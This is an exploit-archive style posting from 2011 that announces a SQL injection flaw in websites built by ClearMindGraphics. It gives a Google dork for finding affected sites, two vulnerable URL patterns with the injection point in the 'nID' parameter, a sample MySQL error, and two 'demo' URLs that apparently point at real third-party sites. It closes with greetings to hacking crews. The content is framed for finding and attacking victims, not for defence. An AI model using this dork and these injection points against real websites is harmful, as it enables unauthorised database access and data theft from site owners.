_________________________________________________________ # # Exploit Title: ClearMindGraphics SQL Injection Vulnerability # -[Google Dork]-: "Site by: ClearMindGraphics" # Date: 2011-18-09 # Author: nGa Sa Lu [ GaNgst3r ] # Service Link: http://www.clearmindgraphics.com/ # Tested on: Vista # Platform : php # ________________________________________________________ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >> Google Dork : "Site by: ClearMindGraphics" >> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ------------------------------------------------------------------------------------------------ http://www.localhost.com/news.php?nID=[SQL] http://www.localhost.com/events_news.php?nID=[SQL] ------------------------------------------------------------------------------------------------ # SQL Error Statement ------------------------ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # Demo --------- http://www.temscoair.com/news.php?nID=8 http://www.greenantelope.net/events_news.php?nID=10 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >> Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros >>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>